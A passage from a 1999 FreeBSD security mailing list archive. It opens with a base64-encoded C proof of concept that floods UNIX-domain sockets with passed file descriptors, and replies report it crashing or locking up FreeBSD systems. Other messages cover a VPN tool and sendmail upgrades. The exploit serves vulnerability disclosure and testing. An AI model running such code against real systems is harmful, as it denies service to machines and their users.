Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="example.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: ATTACHMENT; FILENAME="example.c" I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQoj aW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy91bi5oPg0K I2luY2x1ZGUgPGZjbnRsLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQoNCiNk ZWZpbmUgUEFUSCAiL3RtcC8xMjMiDQojZGVmaW5lIFBBVEhfVE1QICIvdG1w LzEyMy50bXAiDQojZGVmaW5lIFNPTUVfRklMRSAiL2V0Yy9wYXNzd2QiDQoN CnN0cnVjdCBteWNtc2doZHIgew0KCXN0cnVjdCBjbXNnaGRyIGhkcjsNCglp bnQJZmQ7DQp9Ow0KDQpleHRlcm4gZXJybm87DQoNCnZvaWQgc2VydmVyKCk7 DQp2b2lkIGNsaWVudCgpOw0KDQp2b2lkIG1haW4oKQ0Kew0KCXN3aXRjaCAo IGZvcmsoKSkgew0KCWNhc2UgLTE6DQoJCXByaW50ZiggImZvcmsgZXJyb3Ig JWRcbiIsZXJybm8pOw0KCQlicmVhazsNCgljYXNlIDA6DQoJCWZvciAoOzsp IGNsaWVudCgpOw0KCWRlZmF1bHQ6DQoJCXNlcnZlcigpOw0KCX0NCn0NCg0K dm9pZCBzZXJ2ZXIoKQ0Kew0KCXN0cnVjdCBzb2NrYWRkcl91biBhZGRyOw0K CXN0cnVjdCBtc2doZHIgbXltc2doZHI7DQoJc3RydWN0IG15Y21zZ2hkciBh bmNkYnVmOw0KCWNoYXIgCWRhdGFbIDFdOw0KCWludAlzb2NrZmQsDQoJCWxl biwNCgkJZmQ7DQoNCglpZiAoIHVubGluayggUEFUSCkgPT0gLTEpDQoJCXBy aW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglpZiAoKCBz b2NrZmQgPSBzb2NrZXQoIEFGX1VOSVgsU09DS19ER1JBTSwwKSkgPT0gLTEp DQoJCXByaW50ZiggInNvY2tldCBlcnJvciAlZFxuIixlcnJubyk7DQoNCglz dHJjcHkoIGFkZHIuc3VuX3BhdGgsUEFUSCk7DQoJYWRkci5zdW5fbGVuID0g c2l6ZW9mKCBhZGRyLnN1bl9sZW4pICsgc2l6ZW9mKCBhZGRyLnN1bl9mYW1p bHkpIA0KCQkJKyBzdHJsZW4oIGFkZHIuc3VuX3BhdGgpOyANCglhZGRyLnN1 bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5kKCBzb2NrZmQsKHN0 cnVjdCBzb2NrYWRkciAqKSAmYWRkcixhZGRyLnN1bl9sZW4pID09IC0xKQ0K CQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCWZvciAo OzspIHsNCg0KCQlpZiAoKCBmZCA9IG9wZW4oIFNPTUVfRklMRSxPX1JET05M WSkpID09IC0xKSANCgkJCXByaW50ZiggIm9wZW4gZmlsZSBlcnJvciAlZFxu IixlcnJubyk7DQoNCgkJbGVuID0gc2l6ZW9mKCBhZGRyLnN1bl9wYXRoKTsN Cg0KCQlpZiAoIHJlY3Zmcm9tKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBkYXRh KSwwLA0KCQkJKHN0cnVjdCBzb2NrYWRkciAqKSAmYWRkciwmbGVuKSA9PSAt MSkgDQoJCQlwcmludGYoICJyZWN2ZnJvbSBlcnJvciAlZFxuIixlcnJubyk7 DQoNCgkJYW5jZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYp Ow0KCQlhbmNkYnVmLmhkci5jbXNnX2xldmVsID0gU09MX1NPQ0tFVDsNCgkJ YW5jZGJ1Zi5oZHIuY21zZ190eXBlID0gU0NNX1JJR0hUUzsNCgkJYW5jZGJ1 Zi5mZCA9IGZkOw0KDQoJCW15bXNnaGRyLm1zZ19uYW1lID0gKGNhZGRyX3Qp ICZhZGRyOw0KCQlteW1zZ2hkci5tc2dfbmFtZWxlbiA9IGxlbjsNCgkJbXlt c2doZHIubXNnX2lvdiA9IE5VTEw7DQoJCW15bXNnaGRyLm1zZ19pb3ZsZW4g PSAwOw0KCQlteW1zZ2hkci5tc2dfY29udHJvbCA9IChjYWRkcl90KSAmYW5j ZGJ1ZjsNCgkJbXltc2doZHIubXNnX2NvbnRyb2xsZW4gPSBhbmNkYnVmLmhk ci5jbXNnX2xlbjsNCgkJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCgkJDQoJ CWlmICggc2VuZG1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkgDQoJ CQlwcmludGYoICJzZW5kbXNnIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCQlj bG9zZSggZmQpOw0KCX0NCn0NCg0Kdm9pZCBjbGllbnQoKQ0Kew0KCXN0cnVj dCBzb2NrYWRkcl91bglhZGRyX3MsDQoJCQkJYWRkcl9jOw0KCXN0cnVjdCBt eWNtc2doZHIJYW5jZGJ1ZjsNCglzdHJ1Y3QgbXNnaGRyCQlteW1zZ2hkcjsN CgljaGFyIAlkYXRhWyAxXTsNCglpbnQJc29ja2ZkLA0KCQlsZW4sDQoJCWZk Ow0KDQoJaWYgKCggc29ja2ZkID0gc29ja2V0KCBBRl9VTklYLFNPQ0tfREdS QU0sMCkpID09IC0xKSANCgkJcHJpbnRmKCAic29ja2V0IGVycm9yICVkXG4i LGVycm5vKTsNCg0KCWlmICggdW5saW5rKCBQQVRIX1RNUCkgPT0gLTEpDQoJ CXByaW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglzdHJj cHkoIGFkZHJfYy5zdW5fcGF0aCxQQVRIX1RNUCk7DQoJYWRkcl9jLnN1bl9s ZW4gPSBzaXplb2YoIGFkZHJfYy5zdW5fbGVuKSArIHNpemVvZihhZGRyX2Mu c3VuX2ZhbWlseSkgDQoJCQkgICsgc3RybGVuKCBhZGRyX2Muc3VuX3BhdGgp Ow0KCWFkZHJfYy5zdW5fZmFtaWx5ID0gQUZfVU5JWDsNCg0KCXN0cmNweSgg YWRkcl9zLnN1bl9wYXRoLFBBVEgpOw0KCWFkZHJfcy5zdW5fbGVuID0gc2l6 ZW9mKCBhZGRyX3Muc3VuX2xlbikgKyBzaXplb2YoYWRkcl9zLnN1bl9mYW1p bHkpDQoJCSAgICAgICAgICAgKyBzdHJsZW4oIGFkZHJfcy5zdW5fcGF0aCk7 DQoJYWRkcl9zLnN1bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5k KCBzb2NrZmQsKHN0cnVjdCBzb2NrYWRkciopICZhZGRyX2MsYWRkcl9jLnN1 bl9sZW4pID09IC0xKQ0KCQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVy cm5vKTsNCg0KCWlmICggc2VuZHRvKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBk YXRhKSwwLChzdHJ1Y3Qgc29ja2FkZHIgKikgJmFkZHJfcywNCgkJYWRkcl9z LnN1bl9sZW4pID09IC0xKSANCgkJcHJpbnRmKCAic2VuZHRvIGVycm9yICVk XG4iLGVycm5vKTsNCg0KCWxlbiA9IGFkZHJfcy5zdW5fbGVuOw0KDQoJYW5j ZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYpOw0KCWFuY2Ri dWYuaGRyLmNtc2dfbGV2ZWwgPSBTT0xfU09DS0VUOw0KCWFuY2RidWYuaGRy LmNtc2dfdHlwZSA9IFNDTV9SSUdIVFM7DQoNCglteW1zZ2hkci5tc2dfbmFt ZSA9IE5VTEw7DQoJbXltc2doZHIubXNnX25hbWVsZW4gPSAwOw0KCW15bXNn aGRyLm1zZ19pb3YgPSBOVUxMOw0KCW15bXNnaGRyLm1zZ19pb3ZsZW4gPSAw Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sID0gKGNhZGRyX3QpICZhbmNkYnVm Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sbGVuID0gYW5jZGJ1Zi5oZHIuY21z Z19sZW47DQoJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCg0KCWlmICggcmVj dm1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkNCgkJcHJpbnRmKCAi cmVjdm1zZyBlcnJvciAlZFxuIixlcnJubyk7DQoNCglmZCA9IGFuY2RidWYu ZmQ7DQoJDQoJY2xvc2UoZmQpOw0KCWNsb3NlKCBzb2NrZmQpOw0KfQ0K --1958937097-2116286281-925896381=:17696-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 14:16:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from silver.teardrop.net (silver.teardrop.net [216.155.28.66]) by hub.freebsd.org (Postfix) with ESMTP id 28EE215A82 for ; Thu, 6 May 1999 14:16:44 -0700 (PDT) (envelope-from sno@teardrop.org) Received: from localhost (sno@localhost) by silver.teardrop.net (8.9.2/8.9.2) with SMTP id RAA93863; Thu, 6 May 1999 17:16:38 -0400 (EDT) (envelope-from sno@teardrop.org) Date: Thu, 6 May 1999 17:16:38 -0400 (EDT) From: James Snow X-Sender: sno@silver.teardrop.net To: Wojtek Cc: freebsd-security@FreeBSD.ORG Subject: Re: KKIS.05051999.003b (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 6 May 1999, Wojtek wrote: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > As you know, "The UNIX-domain protocol family is a collection of protocols > that provides local interprocess communication through the normal socket > mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses > filesystem pathnames for addressing." > The SOCK_STREAM sockets also supports the communication of UNIX file > descriptors through the use of functions sendmsg() and recvmsg(). > While testing UNIX-domain protocols, we have found probable bug in > FreeBSD's implementation of this mechanism. > When we had run attached example on FreeBSD-3.0 as local user, system > had crashed imediatelly with error "Supervisor read, page not present" > in kernel mode. FWIW, I'm running this a 3.1-R box as we speak, and am using said box to ssh to this box and write this message. Other than causing the following problem: ls: .: Too many open files in system it doesn't appear to be doing anything to me. So, 3.1 is in the clear, it seems. -sno o - - - - - - - - - - - - - o - - - - - - - - - - - - o | We live in the short term | sno at teardrop dot org | | and hope for the best. | I am Geek. Hear me ^G | o - - - - - - - - - - - - - o - - - - - - - - - - - - o To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 16:10:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 3F40714C0D for ; Thu, 6 May 1999 16:10:34 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id QAA03416; Thu, 6 May 1999 16:10:02 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id QAA01800; Thu, 6 May 1999 16:10:02 -0700 Received: from softweyr.com (dyn5.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA20494; Thu, 6 May 99 16:09:58 PDT Message-Id: <37322145.73D7B836@softweyr.com> Date: Thu, 06 May 1999 17:09:57 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: sthaug@nethelp.no Cc: security@FreeBSD.ORG Subject: Re: Forward: KKIS.05051999.003b References: <13867.926015880@verdi.nethelp.no> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Just saw this on Bugtraq. Unable to reproduce it on 3.1-STABLE from > 14. april. On my 3.1-RELEASE system it reports numerous sendmsg ECONNREFUSED and ENOENTs, then eventually dives into repeats of: unlink error 2 bind error 9 sento error 9 recvmsg error 9 socket error 23 Right now it's report "too many open files in system" when I try to do much of anything. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 16:40:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from squirrel.tgsoft.com (cx20270-a.pwy1.sdca.home.com [24.0.169.3]) by hub.freebsd.org (Postfix) with SMTP id 6C7A31515A for ; Thu, 6 May 1999 16:40:31 -0700 (PDT) (envelope-from thompson@squirrel.tgsoft.com) Received: (qmail 11431 invoked by uid 128); 6 May 1999 23:40:30 -0000 Date: 6 May 1999 23:40:30 -0000 Message-ID: <19990506234030.11430.qmail@squirrel.tgsoft.com> From: mark thompson To: pb@fasterix.freenix.org Cc: freebsd-security@freebsd.org Subject: tunip: a quick review (was: VPN) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 30 Apr 1999 23:30:59 +0200 Pierre Beyssac was overheard saying: BTW, as there seems to be a lot of interest in VPNs currently, and I had a need for something that could run between my FreeBSD box and a Linux box, I've written a small usermode IPSEC-compliant tunnel when I became tired of the impressive number of non-compatible hacks based on PPP, ssh, TCP, PPTP, you name it, while IPSEC clearly will sweep all of this. It's more of a proof-of-concept code for the moment (only fixed keys: it lacks key negociation stuff), and it can't beat a kernel implementation for performance, but it's easier to install, easier to port to other systems (you only need some kind of a "tun" device), easier to debug, easier to add weird crypto algorithms, easier to export (the crypto is from the OpenSSL library), and last but not least easier to distribute as a package external to the core OS. I'm happily running it between several FreeBSD and Linux boxes to setup tunnels to friends through my cable modem. If anyone is interested, it can be found here. WARNING: it's really experimental and the documentation is lacking, don't even bother if you don't know how to setup a point to point link or how to add the tun device to your kernel. http://www.enst.fr/~beyssac/tunip.tar.gz I have tried several different IPSec packages. Mostly, they just made my machine unstable. This one is *simple* and *effective*. It worked for me out of the box (FreeBSD 2.7 and 3.1). I suggest making a port of it... Despite the disclaimers above about limited function, the only real problem in terms of setting it up and using it day-to-day is an acute lack of documentation. Try it! -mark -- "The American people will never knowingly adopt Socialism, but under the name of Liberalism, they will adopt every fragment of the Socialist program until one day America will be a Socialist nation without knowing how it happened" Norman Thomas - Socialist Party Presidential candidate -mark To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 17:16:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell.monmouth.com (shell.monmouth.com [205.231.236.9]) by hub.freebsd.org (Postfix) with ESMTP id 0C44614BF4 for ; Thu, 6 May 1999 17:16:51 -0700 (PDT) (envelope-from tbocchino@monmouth.com) Received: from tyan (bg-tc-ppp323.monmouth.com [209.191.61.70]) by shell.monmouth.com (8.9.0/8.9.0) with SMTP id UAA25907 for ; Thu, 6 May 1999 20:16:25 -0400 (EDT) Message-ID: <001701be981f$08efe460$0400a8c0@tyan.bcs> From: "Tom Bocchino" To: Subject: auth 22f8262a unsubscribe freebsd-security tbocchino@monmouth.com Date: Thu, 6 May 1999 20:17:46 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0014_01BE97FD.8182B6E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3155.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0014_01BE97FD.8182B6E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable auth 22f8262a unsubscribe freebsd-security tbocchino@monmouth.com ------=_NextPart_000_0014_01BE97FD.8182B6E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
auth 22f8262a unsubscribe freebsd-security tbocchino@monmouth.com
------=_NextPart_000_0014_01BE97FD.8182B6E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 5:21: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from silver.teardrop.net (silver.teardrop.net [216.155.28.66]) by hub.freebsd.org (Postfix) with ESMTP id 11B2114C29 for ; Fri, 7 May 1999 05:21:01 -0700 (PDT) (envelope-from sno@teardrop.org) Received: from localhost (sno@localhost) by silver.teardrop.net (8.9.2/8.9.2) with SMTP id IAA95603; Fri, 7 May 1999 08:20:43 -0400 (EDT) (envelope-from sno@teardrop.org) Date: Fri, 7 May 1999 08:20:42 -0400 (EDT) From: James Snow X-Sender: sno@silver.teardrop.net To: Wes Peters Cc: sthaug@nethelp.no, security@FreeBSD.ORG Subject: Re: Forward: KKIS.05051999.003b In-Reply-To: <37322145.73D7B836@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 6 May 1999, Wes Peters wrote: > Right now it's report "too many open files in system" when I try to > do much of anything. Seems that I spoke too soon with my previous post. My machine never recoverd from having 'too many open files in system.' I had thought that it would because just the other day I had another 3.1-R box recover from this without trouble. But, 12 hours later, this one still hasn't. (The first box did not have this program run on it.) I don't know enough about the kernel to have a clue here. -sno o - - - - - - - - - - - - - o - - - - - - - - - - - - o | We live in the short term | sno at teardrop dot org | | and hope for the best. | I am Geek. Hear me ^G | o - - - - - - - - - - - - - o - - - - - - - - - - - - o To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 13:39:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from unix.aecinfo.com (unix.aecinfo.com [209.146.217.236]) by hub.freebsd.org (Postfix) with ESMTP id B0C4015197; Fri, 7 May 1999 13:38:56 -0700 (PDT) (envelope-from mitayai@aecinfo.com) Received: from p09 (tor-239.on.ca.aecinfo.com [209.146.217.239]) by unix.aecinfo.com (8.8.8/8.8.8) with SMTP id QAA03003; Fri, 7 May 1999 16:38:51 -0400 (EDT) (envelope-from mitayai@aecinfo.com) Message-ID: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> Reply-To: "Will Mitayai Keeso Rowe" From: "Will Mitayai Keeso Rowe" To: , Cc: "Matt Scollard" Subject: Sendmail 8.8.8 probs. Date: Fri, 7 May 1999 16:38:52 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there any plans to update 2.2-STABLE's sendmail? --- Will Mitayai Keeso Rowe Director of Internet Technology AEC InfoCenter, Inc Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada Phone: +1(416)489-9000 Fax: +1(416)489-3201 Email: mitayai@aecinfo.com Web: http://www.aecinfo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 14: 6:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail-gw2adm.rcsntx.swbell.net (mail-gw2.rcsntx.swbell.net [151.164.30.52]) by hub.freebsd.org (Postfix) with ESMTP id 8B9F814C05; Fri, 7 May 1999 14:06:10 -0700 (PDT) (envelope-from chris@holly.dyndns.org) Received: from holly.dyndns.org (ppp-207-193-13-65.hstntx.swbell.net [207.193.13.65]) by mail-gw2adm.rcsntx.swbell.net (8.8.5/8.8.5) with ESMTP id QAA06698; Fri, 7 May 1999 16:05:54 -0500 (CDT) Received: (from chris@localhost) by holly.dyndns.org (8.9.3/8.9.3) id QAA03001; Fri, 7 May 1999 16:07:11 -0500 (CDT) (envelope-from chris) Date: Fri, 7 May 1999 16:07:10 -0500 From: Chris Costello To: Will Mitayai Keeso Rowe Cc: stable@FreeBSD.ORG, security@FreeBSD.ORG, Matt Scollard Subject: Re: Sendmail 8.8.8 probs. Message-ID: <19990507160709.K1526@holly.dyndns.org> Reply-To: chris@calldei.com References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.1i In-Reply-To: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com>; from Will Mitayai Keeso Rowe on Fri, May 07, 1999 at 04:38:52PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 7, 1999, Will Mitayai Keeso Rowe wrote: > According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there > any plans to update 2.2-STABLE's sendmail? You can always download Sendmail 8.9.3 from sendmail.org, or if you're feeling lucky, migrate to 3.1-STABLE (or wait for 3.2) > > > --- > Will Mitayai Keeso Rowe > Director of Internet Technology > AEC InfoCenter, Inc > Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada > Phone: +1(416)489-9000 Fax: +1(416)489-3201 > Email: mitayai@aecinfo.com Web: http://www.aecinfo.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > -- Chris Costello Don't stop at one bug. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 14:50:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 98CC6153A3; Fri, 7 May 1999 14:50:13 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id PAA17911; Fri, 7 May 1999 15:49:48 -0600 (MDT) Message-Id: <4.2.0.37.19990507154839.044cff00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Fri, 07 May 1999 15:49:41 -0600 To: chris@calldei.com, Will Mitayai Keeso Rowe From: Brett Glass Subject: Re: Sendmail 8.8.8 probs. Cc: stable@FreeBSD.ORG, security@FreeBSD.ORG, Matt Scollard In-Reply-To: <19990507160709.K1526@holly.dyndns.org> References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 2.2.8 is less than half a year old. It ought to be supported. --Brett At 04:07 PM 5/7/99 -0500, Chris Costello wrote: >On Fri, May 7, 1999, Will Mitayai Keeso Rowe wrote: > > According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there > > any plans to update 2.2-STABLE's sendmail? > > You can always download Sendmail 8.9.3 from sendmail.org, or >if you're feeling lucky, migrate to 3.1-STABLE (or wait for 3.2) > > > > > > > --- > > Will Mitayai Keeso Rowe > > Director of Internet Technology > > AEC InfoCenter, Inc > > Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada > > Phone: +1(416)489-9000 Fax: +1(416)489-3201 > > Email: mitayai@aecinfo.com Web: http://www.aecinfo.com > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-stable" in the body of the message > > > >-- >Chris Costello >Don't stop at one bug. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 15: 3:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from guru.phone.net (guru.phone.net [209.157.82.120]) by hub.freebsd.org (Postfix) with SMTP id 68B52153B2 for ; Fri, 7 May 1999 15:03:31 -0700 (PDT) (envelope-from mwm@phone.net) Received: (qmail 48034 invoked by uid 100); 7 May 1999 22:03:30 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 May 1999 22:03:30 -0000 Date: Fri, 7 May 1999 15:03:30 -0700 (PDT) From: Mike Meyer To: stable@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Re: Sendmail 8.8.8 probs. In-Reply-To: <4.2.0.37.19990507154839.044cff00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I didn't think the FreeBSD team supported downrev releases that way. Software fixes - either patches, or new versions of bundled software or ports - showed up in the next release. Since development on 2.2.8 has officially stopped, you don't get new releases - so you don't get that kind of update. On the other hand, if downloading and installing 8.9.3 is more than you can handle, I'll be glad to provide a support contract at prices comparable to Suns :-). Date: Fri, 07 May 1999 15:49:41 -0600 > From: Brett Glass > To: chris@calldei.com, Will Mitayai Keeso Rowe > Cc: stable@FreeBSD.ORG, security@FreeBSD.ORG, Matt Scollard > Subject: Re: Sendmail 8.8.8 probs. > > 2.2.8 is less than half a year old. It ought to be supported. > > --Brett > > At 04:07 PM 5/7/99 -0500, Chris Costello wrote: > >On Fri, May 7, 1999, Will Mitayai Keeso Rowe wrote: > > > According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there > > > any plans to update 2.2-STABLE's sendmail? > > > > You can always download Sendmail 8.9.3 from sendmail.org, or > >if you're feeling lucky, migrate to 3.1-STABLE (or wait for 3.2) > > > > > > > > > > > --- > > > Will Mitayai Keeso Rowe > > > Director of Internet Technology > > > AEC InfoCenter, Inc > > > Suite 200, 25 Imperial Street / Toronto, Ontario / M5P 1B9 / Canada > > > Phone: +1(416)489-9000 Fax: +1(416)489-3201 > > > Email: mitayai@aecinfo.com Web: http://www.aecinfo.com > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-stable" in the body of the message > > > > > > >-- > >Chris Costello > >Don't stop at one bug. > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-stable" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 15:54:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 920D614DED for ; Fri, 7 May 1999 15:54:46 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id AAA19852 for security@freebsd.org; Sat, 8 May 1999 00:54:44 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 498BC884A; Fri, 7 May 1999 23:34:22 +0200 (CEST) (envelope-from roberto) Date: Fri, 7 May 1999 23:34:22 +0200 From: Ollivier Robert To: security@freebsd.org Subject: Re: Sendmail 8.8.8 probs. Message-ID: <19990507233422.A60879@keltia.freenix.fr> Mail-Followup-To: security@freebsd.org References: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: <02fd01be98c9$9fc3a480$efd992d1@p09.aecinfo.com>; from Will Mitayai Keeso Rowe on Fri, May 07, 1999 at 04:38:52PM -0400 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5307 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Will Mitayai Keeso Rowe: > According to sendmail.org, there are a number of security problems with sendmail 8.8.8. Are there > any plans to update 2.2-STABLE's sendmail? Do yourself a favor and install Postfix instead. It is in ports. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #2: Fri Apr 16 22:37:03 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 7 16:59:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id C952314C9B for ; Fri, 7 May 1999 16:59:52 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id TAA10952 for ; Fri, 7 May 1999 19:59:51 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Fri, 7 May 1999 19:59:51 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: security@freebsd.org Subject: Unusual syslog packets, crashing named... 